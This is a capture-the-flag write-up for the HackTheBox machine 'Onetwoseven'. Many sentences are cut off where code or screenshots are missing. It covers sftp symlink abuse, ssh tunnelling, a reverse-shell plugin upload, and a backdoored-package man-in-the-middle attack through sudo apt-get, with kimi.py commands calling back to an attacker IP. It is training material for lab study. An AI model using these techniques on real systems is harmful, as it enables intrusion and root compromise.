Onetwoseven,a Linux box created by HackTheBox user jkr, was an overall hard difficulty box.I really enjoy this box.The foothold for this Linux box craftily utilizes symbolic links and port forwarding through sftp to gain access to the admin interface. This ultimately leads to RCE and a shell after some addon-based web exploitation. For escalating to the root user, we take advantage of the available apt sudo commands while performing a man-in-the-middle package injection via http-proxy.
Let’s Start with Enumarating the ports.
nmap -sC -sV 10.10.10.133
Seeing the nmap result we find only two ports are open
Lets see what is there on port
10.10.10.133 in web browser we see
Digging down we found signup page to be interesting.
Lets open the link after adding
It look like a blank page. Connecting via sftp using
and listing the files we see
looking in man inside that shell we see we can
lets try symlinking signup.php and removing
and viewing the page we can see the signup.php code.
Seeing the code we find the logic for creating user.
Let’s try creating user with
SFTP server with this credentials give us
So, we can get
user.txt and read it.
Enumerating the web site we also find port
60080 is opened internaly and the admin server is listening there.
Lets try to create a
ssh tunnel to that.
ssh -N -L 60080:127.0.0.1:60080 ots-yODc2NGQ@10.10.10.133
Lets visit the admin page we see the
login.php. Lets try
symlink-ing it in the
sftp and viewing the code for that.
We find the username is
ots-admin and we see the password hash.
Cracking it on
crackstation.net we get the password.
Logging in with these credentials to the admin page.
We see we can upload plugin’s download plugins.
ots-man-addon.php we see the rules to upload download and
Reading the code we see we have to satisfy two conditions to upload the plugin.
Which we satisfy with
Using which we upload the Reverse shell.
Executing the uploaded shell we get the Reverse shell as
sudo -l we see
we are allowed to do
apt-get update and
apt-get upgrade without password. We also see that
http_proxy is also pass to the sudo.
So we can try to proxy that and perform a MITM attack.
kimi.py to create a backdoor.
python kimi.py -n nano -l 10.10.15.16 -p 9000 -u 10.10.15.16 -V 2.7.5 -a amd64
dpkg-scanpackage to create a
and created the repo with this as the structure.
and used python to start a http server on port 80 with.
$ python -m SimpleHTTPServer 80
sudo apt-get update and
sudo apt-get upgrade we see our backdoor-ed package is there to install.
And we get the metasploit session and we can use that to grab the
And we completed